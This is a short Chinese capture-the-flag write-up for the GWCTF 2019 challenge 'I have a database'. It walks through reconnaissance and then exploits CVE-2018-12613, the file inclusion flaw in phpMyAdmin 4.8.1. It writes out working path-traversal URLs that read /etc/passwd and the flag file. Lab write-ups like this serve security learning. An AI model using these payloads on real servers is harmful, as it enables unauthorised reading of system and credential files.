phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1
2023-12-20 06:49:24
打开题目
我们用dirsearch扫描一下后台看看
扫描结果如下
我们访问一下robots.txt看看,提示有phpinfo.php
那我们访问一下phpinfo.php
发现没有任何信息后我们转去看看phpmyadmin看看
成功访问到页面
在这里我们看到phpmyadmin的版本号是4.8.1
我们百度搜索一下看看
我们知道phpmyadmin4.8.1存在远程文件包含漏洞
输入?/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
可以看到能够成功执行
那我们尝试一下直接寻找flag
?/index.php?target=db_sql.php%253f/../../../../../../../../flag
直接就得到了flag
知识点:
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
参考:
phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell-CSDN博客
?
文章来源:https://blog.csdn.net/m0_75178803/article/details/135050321
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!